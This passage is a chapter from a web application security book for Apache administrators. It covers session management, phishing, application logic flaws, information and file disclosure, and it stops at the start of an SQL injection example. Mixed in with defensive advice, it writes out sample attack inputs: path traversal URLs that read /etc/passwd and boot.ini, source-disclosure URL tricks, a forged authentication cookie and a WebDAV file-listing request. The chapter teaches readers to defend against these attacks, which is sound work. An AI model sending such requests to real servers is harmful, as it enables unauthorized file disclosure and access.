This chapter covers web application security on a level that is appropriate for the profile of this book. That’s not an easy task: I’ve tried to adequately but succinctly cover all relevant points, without delving into programming too much.
To compensate for the lack of detail in some spots, I have provided a large collection of web application security links. In many cases the links point to security papers that were the first to introduce the problem, thereby expanding the web application security book of knowledge.
Unless you are a programmer, you will not need to concern yourself with every possible detail presented in this chapter. The idea is to grasp the main concepts and to be able to spot major flaws at a first glance. As is typical with the 20/80 rule: invest 20 percent of your effort to get 80 percent of the desired results.
The reason web application security is difficult is because a web application typically consists of many very different components glued together. A typical web application architecture is illustrated in Figure 10-1. In this figure, I have marked the locations where some frequent flaws and attacks occur.
To build secure applications developers must be well acquainted with individual components. In today’s world, where everything needs to be completed yesterday, security is often an afterthought. Other factors have contributed to the problem as well:
HTTP was originally designed for document exchange, but it evolved into an application deployment platform. Furthermore, HTTP is now used to transport whole new protocols (e.g., SOAP). Using one port to transport multiple protocols significantly reduces the ability of classic firewall architectures to control what traffic is allowed; it is only possible to either allow or deny everything that goes over a port.
The Web grew into a mandatory business tool. To remain competitive, companies must deploy web applications to interact with their customers and partners.
Being a plaintext protocol, HTTP does not require any special tools to perform exploitation. Most attacks can be performed manually, using a browser or a telnet client. In addition, many attacks are very easy to execute.
Security issues should be addressed at the beginning of web application development and throughout the development lifecycle. Every development team should have a security specialist on board. The specialist should be the one to educate other team members, spread awareness, and ensure there are no security lapses. Unfortunately this is often not possible in real life.
If you are a system administrator, you may be faced with a challenge to deploy and maintain systems of unknown quality. Even under the best of circumstances, when enough time is allocated to handle security issues, inevitable mistakes will cause security problems. Except for the small number of issues that are configuration errors, you can do little on the Apache level to remedy the problems discussed in this chapter. The bulk of your efforts should go toward creating a robust and defensible environment, which is firmly under your control. Other than that, focus on discovering the application flaws and the attacks that are carried out against them. (You can do this by following the practices described in Chapter 12, which discusses web intrusion detection and prevention.)
In this chapter, I cover the following:
Session management attacks
Attacks on clients (browsers)
Application logic flaws
Information disclosure
File disclosure
Injection attacks
Buffer overflows
Evasion techniques
Web application security resources
HTTP is a stateless protocol. It was never designed to handle sessions. Though this helped the Web take off, it presents a major problem for web application designers. No one anticipated the Web being used as an application platform. It would have been much better to have session management built right into the HTTP standard. But since it wasn’t, it is now re-implemented by every application separately. Cookies were designed to help with sessions but they fall short of finishing the job.
Cookies are a mechanism for web servers and web applications to remember some information about a client. Prior to their invention, there was no way to uniquely identify a client. The only other piece of information that can be used for identification is the IP address. Workstations on local networks often have static, routable IP addresses that rarely change. These addresses can be used for pretty reliable user tracking. But in most other situations, there are too many unknowns to use IP addresses for identification:
Sometimes workstations are configured to retrieve an unused IP address from a pool of addresses at boot time, usually using a DHCP server. If users turn off their computers daily, their IP addresses can (in theory) be different each day. Thus, an IP address used by one workstation one day can be assigned to a different workstation the next day.
Some workstations are not allowed to access web content directly and instead must do so through a web proxy (typically as a matter of corporate policy). The IP address of the proxy is all that is visible from the outside.
Some workstations think they are accessing the Web directly, but their traffic is being changed in real time by a device known as a Network Address Translator (NAT). The address of the NAT is all that is visible from the outside.
Dial-up users and many DSL users regularly get assigned a different IP address every time they connect to the Internet. Only a small percentage of dial-up users have their own IP addresses.
Some dial-up users (for example, those coming through AOL) can have a different IP address on each HTTP request, as their providers route their original requests through a cluster of transparent HTTP proxies.
Finally, some users do not want their IP addresses to be known. They configure their clients to use so-called open proxies and route HTTP requests through them. It is even possible to chain many proxies together and route requests through all of them at once.
Even in the case of a computer with a permanent real (routable) IP address, many users could be using the same workstation. User tracking via an IP address would, therefore, view all these users as a single user.
Something had to be done to identify users. With stateful protocols, you at least know the address of the client throughout the session. To solve the problem for stateless protocols, people at Netscape invented cookies. Perhaps Netscape engineers thought about fortune cookies when they thought of the name. Here is how they work:
Upon first visit (first HTTP request), the site stores information identifying a session into a cookie and sends the cookie to the browser.
The browser does not usually care about the content of a cookie (there are some exceptions as we shall see later), but it will send the cookie back to the site with every subsequent HTTP request.
The site, upon receiving the cookie, retrieves the information out of it and uses it for its operations.
There are two types of cookies:
Session cookies are sent from the server without an expiry date. Because of that they will only last as long as the browser application is open (the cookies are stored in memory). As soon as the browser closes (the whole browser application, not just the window that was used to access the site), the cookie disappears. Session cookies are used to simulate per-session persistence and create an illusion of a session. This is described in detail later in this chapter.
Persistent cookies are stored on disk and loaded every time the browser starts. These cookies have an expiry date and exist until the date is reached. They are used to store long-lived information about the user. For example, low-risk applications can use such cookies to recognize existing users and automatically log them in.
Cookies are transported using HTTP headers. Web servers send cookies in
a Set-Cookie
header. Clients return them in a
Cookie
header. Newer versions of the standard introduce the
names Set-Cookie2
and Cookie2
.
Clients normally send cookies back only to the servers where they originated, or servers that share the same domain name (and are thus assumed to be part of the same network).
To avoid DoS attacks by rogue web servers against browsers, some limits are imposed by the cookie specification (for example, the maximum length is limited and so is the total number of cookies).
Further information on cookies is available from:
“Persistent Client State: HTTP Cookies” (the original Netscape cookie
proposal) (http://home.netscape.com/newsref/std/cookie_spec.html
)
RFC 2965, “HTTP State Management Mechanism” (IETF definition of
Cookie2
and Set-Cookie2
header
fields) (http://www.ietf.org/rfc/rfc2965.txt
)
RFC 2964, “Use of HTTP State Management” (http://www.ietf.org/rfc/2964.txt
)
Session management is closely related to authentication, but while session management is generally needed for authentication, the relationship is not mandatory the other way around: sessions exist even when the user is not authenticated. But the concept is similar:
When a client comes to the application for the first time (or, more precisely, without having session information associated with it), a new session is created.
The application creates what is known as a session token (or session ID) and sends it back to the client.
If the client includes the session token with every subsequent request then the application can use its contents to match the request to the session.
There are three ways to implement sessions:
For sessions to exist, a piece of information must be forwarded back and forth between the server and a client, and cookies were designed for that purpose. Using a cookie is easy: programmers simply need to pick a name for the cookie and store the session token inside.
With this approach, every page is changed to include an additional
parameter. The parameter contains a session token. Receiving such a
parameter is easy. What is more complicated is ensuring every link in
the page contains it. One way to do it is to programmatically construct
every link (for GET
requests) and every form (for
POST
requests). This is difficult. Another way is
to have a page post-processing phase: when the page construction is
completed, a script locates all links and forms and makes changes to
include the session token. This is easier but does not always work. For
example, if a link is generated in JavaScript code, the post-processor
will not detect it to add the session token.
You can have the application embed the session token into the URL. For
example, /view.php
becomes something like
/view.php/3f9hba3578faf3c983/
. The beauty of
this approach (for programmers) is that it does not require additional
effort to make it work. A small piece of code strips out the session
token before individual page processing starts, and the programmer is
not even aware of how the session management works.
Cookies are by far the simplest mechanism to implement sessions and should always be used as a first choice. The other two mechanisms should be used as alternatives in cases where the user’s application does not support cookies (or the user does not accept cookies).
Session tokens can be considered temporary passwords. As with all passwords, they must be difficult to guess or the whole session management scheme will collapse. Ideal session tokens should have the following characteristics:
Long
Not predictable (e.g., not issued sequentially)
Unique
The reasons for these requirements will become clear once we start to discuss different ways of breaking session management.
Attacks against session management are popular because of the high possible gain. Once an attacker learns a session token, he gets instant access to the application with the privileges of the user whose session token he stole.
There are many ways to attempt to steal session tokens:
When the communication channel is not secure, then no information is safe, session tokens included. The danger of someone tapping into the local traffic to retrieve session tokens is likely when applications are used internally and there is a large concentration of users on the same LAN.
URL-based session management techniques are vulnerable in many ways. Someone looking over a shoulder could memorize or write down the session token and then resume the session from somewhere else.
Another issue with URL-based session management techniques is that session tokens can leak. Sometimes users themselves do it by copying a page URL into an email or to a message board.
Referer
request
headerAs you may be aware, the Referer
request header
field contains the URL of the page from which a link was followed to
the current page. If that URL contains a session token and the user
is making a jump to another (likely untrusted) site, the
administrator of that web site will be able to strip the session
token from access logs. Direct all external links to go through an
intermediary internal script to prevent tokens from leaking this
way.
Session tokens are created when they do not exist. But it is also
possible for an attacker to create a session first and then send
someone else a link with the session token embedded in it. The
second person would assume the session, possibly performing
authentication to establish trust, with the attacker knowing the
session token all along. For more information, read the paper by
Mitja Kolsek, of ACROS Security, entitled “Session Fixation
Vulnerability in Web-based Applications“ (http://www.acros.si/papers/session_fixation.pdf
).
Cross-site scripting attacks (XSS) are the favorite methods of stealing a session token from a client. By injecting a small piece of code into the victim’s browser, the session token can be delivered to the attacker. (XSS attacks are explained in the Section 10.6.2 later in this chapter.)
If all else fails, an attacker can attempt to brute-force his way into an application. Applications will generate a new token if you do not supply one, and they typically completely fail to monitor brute-force attacks. An automated script can, in theory, work for days until it produces results.
The use of a flawed session token generation algorithm can dramatically shorten the time needed to brute-force a session. Excellent coverage of session brute-force attacks is provided in the following paper:
“Brute-Force Exploitation of Web Application Session Ids” by David
Endler (iDEFENSE Labs) (http://www.blackhat.com/presentations/bh-usa-02/endler/iDEFENSE%20SessionIDs.pdf ) |
Typical session token problems include:
Tokens are short and can be cycled through easily.
Sequential session tokens are used.
Token values start repeating quickly.
Token generation is based on other predictable information, such as an IP address or time of session creation.
To conclude the discussion about session management, here are some best practices to demonstrate that a robust scheme requires serious thinking:
Create a session token upon first visit.
When performing authentication, destroy the old session and create a new one.
Limit session lifetime to a short period (a few hours).
Destroy inactive sessions regularly.
Destroy sessions after users log out.
Ask users to re-authenticate before an important task is performed (e.g., an order is placed).
Do not use the same session for a non-SSL part of the site as for the SSL part of the site because non-SSL traffic can be intercepted and the session token obtained from it. Treat them as two different servers.
If cookies are used to transport session tokens in an SSL application, they should be marked “secure.” Secure cookies are never sent over a non-SSL connection.
Regenerate session tokens from time to time.
Monitor client parameters (IP address, the User-Agent
request header) and send warnings to the error log when they change. Some
information (e.g., the contents of the User-Agent
header)
should not change for the lifetime of a session. Invalidate the session if
it does.
If you know where your users are coming from, attach each session to a single IP address, and do not allow the address to change.
If you can, do not accept users coming through web proxies. This will be difficult to do for most public sites but easier for internal applications.
If you can, do not accept users coming through open web proxies. Open proxies are used when users want to stay anonymous or otherwise hide their tracks. You can detect which proxies are open by extracting the IP address of the proxy from each proxied request and having a script automatically test whether the proxy is open or not.
If you do allow web proxies, consider using Java applets or Flash movies (probably a better choice since such movies can pretend to be regular animations) to detect the users’ real IP addresses. It’s a long shot but may work in some cases.
An excellent overview of the problems of session management is available in the following paper:
“Web Based Session Management: Best practices in managing HTTP Based Client
Sessions“ by Gunter Ollmann (http://www.technicalinfo.net/papers/WebBasedSessionManagement.html ) |
Though attacks on clients are largely irrelevant for web application security (the exception being the use of JavaScript to steal session tokens), we will cover them briefly from the point of view that if you are in charge of a web application deployment, you must cover all attack vectors.
Here are some of the things that may be targeted:
Browser flaws
Java applets
Browser plug-ins (such as Flash or Shockwave)
JavaScript/VBScript embedded code
Attacking any of these is difficult. Most of the early flaws have been corrected. Someone may attempt to create a custom Mozilla plug-in or Internet Explorer ActiveX component, but succeeding with that requires the victim to willingly accept running the component. If your users are doing that, then you have a bigger problem with all the viruses spreading around. The same users can easily become victims of phishing (see the next section).
Internet Explorer is a frequent target because of its poor security record. In my opinion, Internet Explorer, Outlook, and Outlook Express should not be used in environments that require a high level of security until their security improves. You are better off using software such as Mozilla Suite (or now separate packages Firefox and Thunderbird).
Phishing is a shorter version of the term password fishing. It is used for attacks that try to trick users into submitting passwords and other sensitive private information to the attacker by posing as someone else. The process goes like this:
Someone makes a copy of a popular password-protected web site (we are assuming passwords are protecting something of value). Popular Internet sites such as Citibank, PayPal, and eBay are frequent targets.
This person sends forged email messages to thousands, or even millions, of users, pretending the messages are sent from the original web site and directing people to log in to the forged site. Attackers usually use various techniques to hide the real URL the users are visiting.
Naïve users will attempt to login and the attacker will record their usernames and passwords. The attacker can now redirect the user to the real site. The user, thinking there was a glitch, attempts to log in again (this time to the real site), succeeds, thinks everything is fine, and doesn’t even notice the credentials were stolen.
The attacker can now access the original password-protected area and exploit this power, for example by transferring funds from the victim’s account to his own.
Now think of your precious web application; could your users become victims of a scam like this? If you think the chances are high, do the following:
Educate your users about potential dangers. Explain how you will never send emails asking them about their security details or providing links to log in. Provide a way for users to verify that the emails they receive are genuine (from you, not an attacker).
Restrict application access based on IP address and possibly based on time of access. This technique works, but you will be able to use it only for internal applications, where you can control where the users are logging in from.
Record who is logging on, when, and from which IP address. Then implement automated tools to establish usage patterns and detect anomalies.
Phishing is a real problem, and very difficult to solve. One solution may be to deploy SSL with client certificates required (or using any other Type 2 authentication method, where users must have something with them to use for authentication). This will not prevent users from disclosing their credentials but will prevent the attacker from using them to access the site because the attacker will be missing the appropriate certificate. Unfortunately, client certificates are difficult to use, so this solution only works for smaller applications and closely controlled user groups. A proper solution is yet to be determined but may revolve around the following ideas:
Deprecate insecure authentication methods, such as Basic authentication, because they send user credentials to the site verbatim.
Design new authentication methods (or upgrade Digest implementations) to allow for mutual authentication (clients to servers and servers to clients).
Upgrade the existing protocols to take the human factor into account as well.
Design better client applications (as discussed in the section Section 4.2.2 in Chapter 4).
Continue educating users.
No quick remedies will be created for the phishing problem, since none of the ideas will be easy to implement. The following resources are useful if you want to learn more about this subject:
Application logic flaws are the result of a lack of understanding of the web application programming model. Programmers are often deceived when something looks right and they believe it works right too. Most flaws can be tracked down to two basic errors:
Information that comes from the client is trusted and no (or little) validation is performed.
Process state is not maintained on the server (in the application).
I explain the errors and the flaws resulting from them through a series of examples.
Information stored in cookies and hidden form fields is not visible to the naked eye. However, it can be accessed easily by viewing the web page source (in the case of hidden fields) or configuring the browser to display cookies as they arrive. Browsers in general do not allow anyone to change this information, but it can be done with proper tools. (Paros, described in the Appendix A, is one such tool.)
Because browsers do not allow anyone to change cookie information, some programmers use cookies to store sensitive information (application data). They send cookies to the client, accept them back, and then use the application data from the cookie in the application. However, the data has already been tainted.
Imagine an application that uses cookies to authenticate user sessions. Upon successful authentication, the application sends the following cookie to the client (I have emphasized the application data):
Set-Cookie: authenticated=true
; path=/; domain=www.example.com
The application assumes that whoever has a cookie named
authenticated
containing true
is an
authenticated user. With such a concept of security, the attacker only needs to
forge a cookie with the same content and access the application without knowing the
username or the password.
It is a similar story with hidden fields. When there is a need in the application to perform a two-step process, programmers will often perform half of the processing in the first step, display step one results to the user in a page, and transmit some internal data into the second step using hidden fields. Though browsers provide no means for users to change the hidden fields, specialized tools can. The correct approach is to use the early steps only to collect and validate data and then repeat validation and perform the main task in the final step.
Allowing users to interfere with application internal data often results in attackers being able to do the following:
Change product price (usually found in simpler shopping carts)
Gain administrative privileges (vertical privilege escalation)
Impersonate other users (horizontal privilege escalation)
An example of this type of flaw can be found in numerous form-to-email scripts. To enable web designers to have data sent to email without a need to do any programming, all data is stored as hidden form fields:
<form action="/cgi-bin/FormMail" method="POST"> <input type="hidden" name="subject" value="Call me back"> <input type="hidden" name="recipient" value="sales@example.com"> <!-- the visible part of the form follows here --> </form>
As was the case with cookies, the recipient field can be manipulated to send email to any email address. Spammers were quick to exploit this type of fault, using form-to-email scripts to send unsolicited email messages.
Many form-to-email scripts still work this way but have been improved to send email only to certain domains, making them useless to spammers.
Some believe the POST
request method is more secure than
GET
. It is not. GET
and
POST
both exist because they have different meanings, as
explained in the HTTP specification:
GET
request methods should only cause information about
a resource to be transmitted from the server to the client. It should never
be used to cause a change of the resource.
POST
request methods should be used only to make
changes to resources on the server.
Because a casual user cannot perform a POST
request just like
that—a GET
request only requires typing the URL into the location
field, while a POST
request requires basic knowledge of
HTML—people think POST
requests are somehow safe. An example of
this misplaced trust is given in the next section.
The referrer field is a special header field added to each request by HTTP clients (browsers). Not having been created by the server, its contents cannot be trusted. But a common mistake is to rely on the referrer field for security.
Early versions of many form-to-email scripts did that. They checked the
Referer
request field (also known as
HTTP_REFERER
) and refused to work when the contents did not
contain a proper address. This type of check has value. Because
browsers populate the referrer field correctly, it becomes
impossible to use the form-to-email script from another web site. However, it does
not protect against spammers, who can programmatically create HTTP requests.
Process state management is difficult to do in web applications, and most programmers do not do it when they know they should. This is because most programming environments support stateless programming well, but do not help with stateful operations. Take a user registration process, for example, one that consists of three steps:
Choose a username.
Enter personal details.
Perform registration.
Choosing a username that is not already in use is vital for the process as a
whole. The user should be allowed to continue on to the second step only after she
chooses an unused username. However, a stateless implementation of this process does
not remember a user’s past actions. So if the URL of the second step is easy to
guess (e.g., register2.php
), the user can type in the address
and enter step 2 directly, giving as a parameter a username that has not been
validated (and possibly choosing an existing username).
Depending on how the rest of the process is coded, this can lead to an error at the end (in the best case) or to database inconsistency (in the worst case).
Another good example of this problem is the use of form-to-email scripts for registration before file download. In many cases, this is a stateless two-step process. The source code will reveal the URL of the second page, which usually contains a link for direct download.
Relying only on client-side validation (JavaScript) to validate script input data is a result of a common misconception that an HTTP client is part of the web programming model. I cannot emphasize enough that it is not. From a security point of view, client-side JavaScript is just a mechanism that enhances user experience with the application because it gives form feedback instantly instead of having the user wait for the request to go to the server and return with some results. Besides, it is perfectly normal (and happens often) that a browser does not support JavaScript at all, or that the user turned off the support to increase security.
Lack of server-side validation can lead to any of the problems described in this chapter. This problem is often easy to detect. In the worst case (validation only performed in the client) simply attempting to use a web application with JavaScript turned off will result in many errors in a vulnerable application. In most cases, however, it is necessary to test each input separately to detect where the vulnerabilities lie.
The more bad guys know about your system, the easier it becomes to find a way to compromise it. Information disclosure refers to the family of flaws that reveal inside information.
There is more in HTML pages than most people see. A thorough analysis of HTML page source code can reveal useful information. The structure of the source code is itself important because it can tell a lot about the person who wrote it. You can judge that person’s design and programming skills and learn what to expect.
You can commonly find comments in HTML code. For web designers, it is the only place for comments other designers can see. Even programmers, who should be writing comments in code and not in HTML (comments in code are never sent to browsers) sometimes make a mistake and put in information that should not be there.
The JavaScript code can reveal even more about the coder’s personality. Parts of the code that deal with data validation can reveal information about application business rules. Programmers sometimes fail to implement data validation on the server side, relying on the client-side JavaScript instead. Knowing the business rules makes it easier to test for boundary cases.
Tools used to create pages often put comments in the code. Sometimes they reveal paths on the filesystem. You can identify the tool used, which may lead to other discoveries (see the “Predictable File Locations“ section below).
A directory listing is a dynamically generated page showing the contents of a
requested folder. Web servers creating such listings are only trying to be helpful,
and they usually do so only after realizing the default index file
(index.html
, index.php
, etc.) is
absent. Directory listings are sometimes served to the client even when a default
index file exists, as a result of web server vulnerability. This happens to be one
of the most frequent Apache problems, as you can see from the following list of
releases and their directory listing vulnerabilities. (The Common Vulnerability and
Exposure numbers are inside the parentheses; see http://cve.mitre.org
.)
v1.3.12 Requests can cause directory listing on NT (CVE-2000-0505).
v1.3.17 Requests can cause directory listing to be displayed (CVE-2001-0925).
v1.3.20 Multiviews can cause a directory listing to be displayed (CVE-2001-0731).
v1.3.20 Requests can cause directory listing to be displayed on Win32 (CVE-2001-0729).
A directory-listing service is not needed in most cases and should be turned off. Having a web server configured to produce directory listings where they are not required should be treated as a configuration error.
The problem with directory listings is in what they show, coupled with how people behave:
Many people do not understand that the absence of a link pointing to a file does not protect the file from those who know it is there.
Some people do know but think no one will find out (they are too lazy to set up a proper environment for sharing files).
Files are created by mistake (for example, file editors often create backup files), or are left there by mistake (for example, “I’ll put this file here just for a second and delete it later“).
In the worst-case scenario, a folder used exclusively to store files for download
(some of which are private) will be left without a default file. The attacker only
needs to enter the URL of the folder to gain access to the full list of files.
Turning directory listings off (using Options -Indexes
, as shown
in Chapter 2) is essential, but it is not a
complete solution, as you will see soon.
Web Distributed Authoring and Versioning (WebDAV), defined at http://www.ietf.org/rfc/rfc2518.txt
, is an extension
of the HTTP protocol. It consists of several new request methods that are added
on top of HTTP to allow functionality such as search (for files), copy, and
delete. Left enabled on a web site, WebDAV will allow anyone to enumerate files
on the site, even with all directory indexes in place or directory listings
turned off.
What follows is a shortened response from using telnet to connect to a web
site that contains only three files (the root folder counts as one) and then
sending the PROPFIND
request (new with WebDAV) asking for the
contents of the web server root folder. Users browsing normally would get served
index.html
as the home page but you can see how WebDAV
reveals the existence of the file secret.data
. I have
emphasized the parts of the output that reveal the filenames.
$telnet ivanristic.com 8080
Trying 217.160.182.153... Connected to ivanristic.com. Escape character is '^]'.PROPFIND / HTTP/1.0
Depth: 1
HTTP/1.1 207 Multi-Status Date: Sat, 22 May 2004 19:21:32 GMT Server: Apache/2.0.49 (Unix) DAV/2 PHP/4.3.4 Connection: close Content-Type: text/xml; charset="utf-8" <?xml version="1.0" encoding="utf-8"?> <D:multistatus xmlns:D="DAV:"> <D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/"> <D:href>/</D:href> <D:propstat> <D:prop> ... </D:prop> <D:status>HTTP/1.1 200 OK</D:status> </D:propstat> </D:response> <D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/"> <D:href>/secret.data</D:href> <D:propstat> <D:prop> ... </D:prop> <D:status>HTTP/1.1 200 OK</D:status> </D:propstat> </D:response> <D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/"> <D:href>/index.html</D:href> <D:propstat> <D:prop> ... </D:prop> <D:status>HTTP/1.1 200 OK</D:status> </D:propstat> </D:response> </D:multistatus>
Information disclosure through WebDAV is a configuration error (WebDAV should never be enabled for the general public). I mention it here because the consequences are similar to those of providing unrestricted directory listings. Some Linux distributions used to ship with WebDAV enabled by default, resulting in many sites unwillingly exposing their file listings to the public.
“Secure by default” is not a concept appreciated by many application server vendors who deliver application servers in developer-friendly mode where each error results in a detailed message being displayed in the browser. Administrators are supposed to change the configuration before deployment but they often do not do so.
This behavior discloses a lot of information that would otherwise be invisible to an attacker. It allows attackers to detect other flaws (e.g., configuration flaws) and to learn where files are stored on the filesystem, leading to successful exploitation.
A correct strategy to deal with this problem is as follows. (See Chapter 2 for technical details.)
Configure server software (web server, application server, etc.) such that it does not display verbose error messages to end users and instead logs them into a log file.
Instruct developers to do the same for the applications and have
applications respond with HTTP status 500
whenever an
error occurs.
Install custom error pages using the Apache
ErrorDocument
directive.
If all else fails (you have to live with an application that behaves incorrectly
and you cannot change it), a workaround is possible with Apache 2 and
mod_security
. Using output filtering (described in Chapter 12), error messages can be detected and
replaced with less dangerous content before the response is delivered to the
client.
Programmers often need a lot of information from an application to troubleshoot problems. This information is often presented at the bottom of each page when the application is being executed in debug mode. The information displayed includes:
Application configuration parameters (which may include passwords)
System environment variables
Request details (IP addresses, headers, request parameters)
Information that resulted from processing the request, such as script variables, or SQL queries
Various log messages
The effect of all this being disclosed to someone other than a developer can be devastating. The key question is, how is an application getting into debug mode?
Programmers often use special request parameters, which work across
the application. When such a method becomes known (and it often does)
anyone appending the parameter (for example debug=1
)
to a URL can change into the debug mode.
A slightly better approach is to use a password to protect the debug mode. Although better, chances are programmers will use a default password that does not change across application installations.
When a programming team sits behind a fixed set of IP addresses, they often configure the application to display debugging information automatically, upon detecting a “trusted” visitor. This approach is common for internal teams developing custom applications.
One of the safer approaches is to have debug mode as one of the application privileges and assign the privilege to certain accounts. This approach represents a good compromise and delegates debug mode authorization to central authorization code, where such a decision belongs.
My recommendation is to have the debug mode turned off completely for production systems (and when I say turned off, I mean commented out of the source code).
Alternatively, a special request parameter (password-protected) can be used as an indicator that debug mode is needed, but the information would be dumped to a place (such as a log file) where only a developer can access it.
File disclosure refers to the case when someone manages to download a file that would otherwise remain hidden or require special authorization.
Path traversal occurs when directory backreferences are used in a path to gain access to the parent folder of a subfolder. If the software running on a server fails to resolve backreferences, it may also fail to detect an attempt to access files stored outside the web server tree. This flaw is known as path traversal or directory traversal. It can exist in a web server (though most web servers have fixed these problems) or in application code. Programmers often make this mistake.
If it is a web server flaw, an attacker only needs to ask for a file she knows is there:
http://www.example.com/../../etc/passwd
Even when she doesn’t know where the document root is, she can simply increase the number of backreferences until she finds it.
Under ideal circumstances, files will be downloaded directly using the web server. But when a nontrivial authorization scheme is needed, the download takes place through a script after the authorization. Such scripts are web application security hot spots. Failure to validate input in such a script can result in arbitrary file disclosure.
Imagine a set of pages that implement a download center. Download happens through
a script called download.php
, which accepts the name of the
file to be downloaded in a parameter called filename
. A careless
programmer may form the name of the file by appending the filename to the base
directory:
$file_path = $repository_path + "/" + $filename;
An attacker can use the path traversal attack to request any file on the web server:
http://www.example.com/download.php?filename=../../etc/passwd
You can see how I have applied the same principle as before, when I showed attacking the web server directly. A naïve programmer will not bother with the repository path, and will accept a full file path in the parameter, as in:
http://www.example.com/download.php?filename=/etc/passwd
A file can also be disclosed to an attacker through a vulnerable script that uses
a request parameter in an include
statement:
include($file_path);
PHP will attempt to run the code (making this flaw more dangerous, as I will discuss later in the section “Code Execution”), but if there is no PHP code in the file it will output the contents of the file to the browser.
Source code disclosure usually happens when a web server is tricked into displaying a script instead of executing it. A popular way of doing this is to modify the URL enough to confuse the web server (and prevent it from determining the MIME type of the file) and simultaneously keep the URL similar enough to the original to allow the operating system to find it. This will become clearer after a few examples.
URL-encoding some characters in the request used to cause Tomcat and WebLogic to
display the specified script file instead of executing it (see http://www.securityfocus.com/bid/2527
). In the following
example, the letter p
in the extension .jsp
is URL-encoded:
http://www.example.com/index.js%70
Appending a URL-encoded null byte to the end of a request used to cause JBoss to
reveal the source code (see http://www.securityfocus.com/bid/7764
).
http://www.example.com/web-console/ServerInfo.jsp%00
Apache will respond with a 404
(Not found) response to any
request that contains a URL-encoded null byte in the filename.
Many web servers used to get confused by the mere use of uppercase letters in the file extension (an attack effective only on platforms with case-insensitive filesystems):
http://www.example.com/index.JSP
Another way to get to the source code is to exploit a badly written script that is
supposed to allow selective access to source code. At one point, Internet
Information Server shipped with such a script enabled by default (see http://www.securityfocus.com/bid/167
). The script was
supposed to show source code to the example programs only, but because programmers
did not bother to check which files were being requested, anyone was able to use the
script to read any file on the system. Requesting the following URL, for example,
returned the contents of the boot.ini
file from the root of the
C: drive:
http://www.sitename.com/msadc/Samples/SELECTOR/showcode.asp?source=
/msadc/Samples/../../../../../boot.ini
Most of the vulnerabilities are old because I chose to reference the popular servers to make the examples more interesting. You will find that new web servers almost always suffer from these same problems.
You have turned directory listings off and you feel better now? Guessing filenames is sometimes easy:
If you need to perform a quick test on the web server, chances are you
will name the file according to the test you wish to make. Names like
upload.php
, test.php
, and
phpinfo.php
are common (the extensions are
given for PHP but the same logic applies to other environments).
Old files may be left on the server with names such as
index2.html
,
index.old.html
, or
index.html.old
.
Web authoring applications often generate files that find their way to
the server. (Of course, some are meant to be on the server.) A good
example is a popular FTP client, WS_FTP. It places a log file into each
folder it transfers to the web server. Since people often transfer
folders in bulk, the log files themselves are transferred, exposing file
paths and allowing the attacker to enumerate all files. Another example
is CityDesk, which places a list of all files in the root folder of the
site in a file named citydesk.xml
. Macromedia’s
Dreamweaver and Contribute have many publicly available files.
Configuration management tools create many files with metadata. Again,
these files are frequently transferred to the web site. CVS, the most
popular configuration management tool, keeps its files in a special
folder named CVS
. This folder is created as a
subfolder of every user-created folder, and it contains the files
Entries
, Repository
, and
Root
.
Text editors often create backup files. When changes are performed
directly on the server, backup files remain there. Even when created on
a development server or workstation, by the virtue of bulk folder FTP
transfer, they end up on the production server. Backup files have
extensions such as ~
, .bak
,
.old
, .bkp
,
.swp
.
Script-based applications often consist of files not meant to be accessed directly from the web server but instead used as libraries or subroutines. Exposure happens if these files have extensions that are not recognized by the web server as a script. Instead of executing the script, the server sends the full source code in response. With access to the source code, the attacker can look for security-related bugs. Also, these files can sometimes be manipulated to circumvent application logic.
Sometimes user home directories are made available under the web
server. As a consequence, command-line history can often be freely
downloaded. To see some examples, type
inurl:.bash_history
into Google. (The use of
search engines to perform reconnaissance is discussed in Chapter 11.)
Most downloads of files that should not be downloaded happen because web servers do not obey one of the fundamental principles of information security—i.e., they do not fail securely. If a file extension is not recognized, the server assumes it is a plain text file and sends it anyway. This is fundamentally wrong.
You can do two things to correct this. First, configure Apache to only serve
requests that are expected in an application. One way to do this is to use
mod_rewrite
and file extensions.
# Reject requests with extensions we don't approve RewriteCond %{SCRIPT_FILENAME} "!(\.html|\.php|\.gif|\.png|\.jpg)$" RewriteRule .* - [forbidden]
Now even if someone uploads a spreadsheet document to the web server, no one will
be able to see it because the mod_rewrite
rules will block
access. However, this approach will not protect files that have allowed extensions
but should not be served. Using mod_rewrite
, we can create a list
of requests we are willing to accept and serve only those. Create a plain text file
with the allowed requests listed:
# This file contains a list of requests we accept. Because # of the way mod_rewrite works each line must contain two # tokens, but the second token can be anything. # / - /index.php - /news.php - /contact.php -
Add the following fragment to the Apache configuration. (It is assumed the file
you created was placed in
/usr/local/apache/conf/allowed_urls.map
.)
# Associate a name with a map stored in a file on disk RewriteMap allowed_urls txt:/usr/local/apache/conf/allowed_urls.map # Try to determine if the value of variable "$0" (populated with the # request URI in this case) appears in the rewrite map we defined # in the previous step. If there is a match the value of the # "${allowed_urls:$0|notfound}" variable will be replaced with the # second token in the map (always "-" in our case). In all other cases # the variable will be replaced by the default value, the string that # follows the pipe character in the variable - "notfound". RewriteCond ${allowed_urls:$0|notfound} ^notfound$ # Reject the incoming request when the previous rewrite # condition evaluates to true. RewriteRule .* - [forbidden]
Finally, we reach a type of flaw that can cause serious damage. If you thought the flaws we have covered were mostly harmless you would be right. But those flaws were a preparation (in this book, and in successful compromise attempts) for what follows.
Injection flaws get their name because when they are used, malicious user-supplied data flows through the application, crosses system boundaries, and gets injected into another system component. System boundaries can be tricky because a text string that is harmless for PHP can turn into a dangerous weapon when it reaches a database.
Injection flaws come in as many flavors as there are component types. Three flaws are particularly important because practically every web application can be affected:
When an injection flaw causes user input to modify an SQL query in a way that was not intended by the application author
When an attacker gains control of a user browser by injecting HTML and Java-Script code into the page
When an attacker executes shell commands on the server
Other types of injection are also feasible. Papers covering LDAP injection and XPath injection are listed in the section Section 10.9.
SQL injection attacks are among the most common because nearly every web application uses a database to store and retrieve data. Injections are possible because applications typically use simple string concatenation to construct SQL queries, but fail to sanitize input data.
SQL injections are fun if you are not at the receiving end. We will use a complete programming example and examine how these attacks take place. We will use PHP and MySQL 4.x. You can download the code from the book web site, so do not type it.
Create a database with two tables and a few rows of data. The database represents an imaginary bank where my wife and I keep our money.
